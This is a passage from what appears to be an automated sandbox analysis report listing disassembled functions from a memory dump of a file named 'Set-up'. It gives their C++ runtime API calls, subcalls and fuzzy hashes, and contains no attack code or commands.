                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: fa44c75456786a6c8d7c58d83f142a8bff163c89e9f32a58ffa97fbb19a38c09
                                                                                              • Instruction ID: 8259cb8c009ca1c59cb7652ac9804eddc03c5fb28cf71ba2d55dbee40b78d5d9
                                                                                              • Opcode Fuzzy Hash: fa44c75456786a6c8d7c58d83f142a8bff163c89e9f32a58ffa97fbb19a38c09
                                                                                              • Instruction Fuzzy Hash: 4E217971A15108AFCB05CFA8C991EEDFBB9AF58308F24405DE542B7291EB799F04DB60
                                                                                              Function 6BC2B185 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2B18C
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2B1AB
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2B1C9
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2B22D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: a7fb91310248dd0365f609735ff1eb24b33e284773c8cef1c84da96e7a974c54
                                                                                              • Instruction ID: 42cd3e11f89d16f5881c8255f779cc783bc0386f53dd3053a473e15b2ef8947f
                                                                                              • Opcode Fuzzy Hash: a7fb91310248dd0365f609735ff1eb24b33e284773c8cef1c84da96e7a974c54
                                                                                              • Instruction Fuzzy Hash: F321AC71A11108AFCB04CFE8C991EEDFBB5AF18308F244059E142B7281EB799F44DB60
                                                                                              Function 6BC2D14C Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2D153
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2D172
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2D190
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2D1F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: a26b6f97c18c587c9562b8a737a6c7ee6d13a62f5617bf2c6a4909a3d6394b73
                                                                                              • Instruction ID: 157dd5f4f326ea6a4286bfc90cd2a9fdef492c6342b1a9e6c1fcaf4694a3d0e1
                                                                                              • Opcode Fuzzy Hash: a26b6f97c18c587c9562b8a737a6c7ee6d13a62f5617bf2c6a4909a3d6394b73
                                                                                              • Instruction Fuzzy Hash: 7821AC71A11108AFCB04CFA8C981EEDBBB5AF58308F244059E142B7291EB399F44DB60
                                                                                              Function 6BC2D045 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2D04C
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2D06B
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2D089
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2D0ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: 5d0d588c5fcbe51d8cb219537270cd5f43758c23f0fed23b4e14d0523b270743
                                                                                              • Instruction ID: afdc7fe1ccb07ce174369fa23360f7a056add0cfcc0614f78e6065d5b4b80bb0
                                                                                              • Opcode Fuzzy Hash: 5d0d588c5fcbe51d8cb219537270cd5f43758c23f0fed23b4e14d0523b270743
                                                                                              • Instruction Fuzzy Hash: 6F21AC71A11108AFCB04CFA8C991EEDFBB5AF18308F244059E142B7291EB399F44DB60
                                                                                              Function 6BC2DD54 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2DD5B
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2DD83
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sbumpc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2DDCA
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2DDFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?sbumpc@?$basic_streambuf@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2890278595-0
                                                                                              • Opcode ID: 2a4d51d61d4ab1da9664c7c8352baf2217af05f0139b71a1a8074799c52e5d65
                                                                                              • Instruction ID: 6e0ba54610358428a0061f0b20030dbcf302eb86d44146d2f5e25fa550513f8f
                                                                                              • Opcode Fuzzy Hash: 2a4d51d61d4ab1da9664c7c8352baf2217af05f0139b71a1a8074799c52e5d65
                                                                                              • Instruction Fuzzy Hash: 49217431961B4ADFCB10CF65C8905ADBBB0BF65324F60C16ED8A567290E7388B41DF61
                                                                                              Function 6BC1EE8C Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC1EE93
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,?,?,?,00000014), ref: 6BC1EEB3
                                                                                              • _CxxThrowException.MSVCR100(6BC117C4,6BC4CB18), ref: 6BC1EEC9
                                                                                              • ?_Segment_index_of@_Concurrent_vector_base_v4@details@Concurrency@@KAII@Z.MSVCP100(?,00000014), ref: 6BC1EED2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@Concurrency@@Concurrent_vector_base_v4@details@ExceptionH_prolog3_catchSegment_index_of@_Throw
                                                                                              • String ID:
                                                                                              • API String ID: 264175448-0
                                                                                              • Opcode ID: 9346a8ced81c94903426e73bfb4f9b0b7dce51eaba3e7fc46fee0808fbc00a17
                                                                                              • Instruction ID: 983a8703443d4625d80c78027e6cfbe641be6f8b3a3852d131f21849aad7d82f
                                                                                              • Opcode Fuzzy Hash: 9346a8ced81c94903426e73bfb4f9b0b7dce51eaba3e7fc46fee0808fbc00a17
                                                                                              • Instruction Fuzzy Hash: 2C11BE7293821A9BCB10CF60C8419DE77B6BF88315B104569E816EB990FB3D9745DBA0
                                                                                              Function 6BC191D2 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC191D9
                                                                                                • Part of subcall function 6BC1A494: __EH_prolog3.LIBCMT ref: 6BC1A49B
                                                                                                • Part of subcall function 6BC1A494: ??0_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100(?,00000000,6BC191E9,?,00000004,6BC1870C,?,?,00000000,?), ref: 6BC1A4D5
                                                                                              • ??0_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100(?,00000004,6BC1870C,?,?,00000000,?), ref: 6BC1921C
                                                                                              • ??0_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1922C
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000018), ref: 6BC19244
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0_Concurrency@@Lock@details@Reentrant$H_prolog3$??2@
                                                                                              • String ID:
                                                                                              • API String ID: 694345405-0
                                                                                              • Opcode ID: 52a7dbac7e074abde2fe0252126154ebda3425b61ed00ffc71e3746d019e7e88
                                                                                              • Instruction ID: 53d07ac08d765707ee065023be7475cfc9d160bc549a1158aac4eecf9c8c28ed
                                                                                              • Opcode Fuzzy Hash: 52a7dbac7e074abde2fe0252126154ebda3425b61ed00ffc71e3746d019e7e88
                                                                                              • Instruction Fuzzy Hash: 0321ACB0A18246DFCB18CF68C4847DCBBB0BB59310F10466DE46AA7241E7B89B15EB90
                                                                                              Function 6BC1AB2C Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1AB33
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C,6BC1A716,00000014,6BC1A63D,?), ref: 6BC1AB41
                                                                                              • ?set@event@Concurrency@@QAEXXZ.MSVCR100 ref: 6BC1ABAB
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1ABB8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??1_?set@event@H_prolog3V123@@
                                                                                              • String ID:
                                                                                              • API String ID: 2645808778-0
                                                                                              • Opcode ID: e5e6fb954df1f2f166d1fe0c711121bad7fa2c053aac9581d20755530e70fdd6
                                                                                              • Instruction ID: 6715861ac81a3dbee6f795caeb9dc9930bf8a610879eeda503d4f1acd96453a6
                                                                                              • Opcode Fuzzy Hash: e5e6fb954df1f2f166d1fe0c711121bad7fa2c053aac9581d20755530e70fdd6
                                                                                              • Instruction Fuzzy Hash: CF214F75900206DFCB08CFA4C5999EEFBB1FF49311F104198E512A7660DB35EA05CFA0
                                                                                              Function 6BC29391 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC29398
                                                                                              • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP100(?,00000000,00000000,00000008), ref: 6BC293DB
                                                                                              • ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP100(00000000,00000000,?,?,?,?,00000008), ref: 6BC2940A
                                                                                              • ?swap@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXAAV12@@Z.MSVCP100(?,?,?,?,?,00000008), ref: 6BC29428
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$??0?$basic_istream@?init@?$basic_ios@?swap@?$basic_ios@D@std@@@1@_D@std@@@2@_H_prolog3V12@@
                                                                                              • String ID:
                                                                                              • API String ID: 1953463137-0
                                                                                              • Opcode ID: 60c3e9e03025c460aaa368b1cdaaf3f30ade07de6d1177e30fe9bdab142dae1d
                                                                                              • Instruction ID: 5968bdf6735d59ead34257826f1247e6bada56689fff30f2415f8dc3e4ae8786
                                                                                              • Opcode Fuzzy Hash: 60c3e9e03025c460aaa368b1cdaaf3f30ade07de6d1177e30fe9bdab142dae1d
                                                                                              • Instruction Fuzzy Hash: 351158B86202148FC710CF58C491A59FBF4FF08348B14885CE5999B301D779EF01CB90
                                                                                              Function 6BC2DFF9 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2E000
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000018), ref: 6BC2E02B
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000018), ref: 6BC2E050
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000018), ref: 6BC2E0AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2087867759-0
                                                                                              • Opcode ID: 1510145d029a98d6c4872f110ae32e6ce0866b2a749375da33ae502eebb8a4c9
                                                                                              • Instruction ID: 4298dd41dacda0cdca015cd15149f4259e1c74b3377c678070874fda7120c75b
                                                                                              • Opcode Fuzzy Hash: 1510145d029a98d6c4872f110ae32e6ce0866b2a749375da33ae502eebb8a4c9
                                                                                              • Instruction Fuzzy Hash: C4115B74D2520ACECB14DFA9C5915ADFBB0FF99304B60406DD19277290E7394F05EB60
                                                                                              Function 6BC2E0D7 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
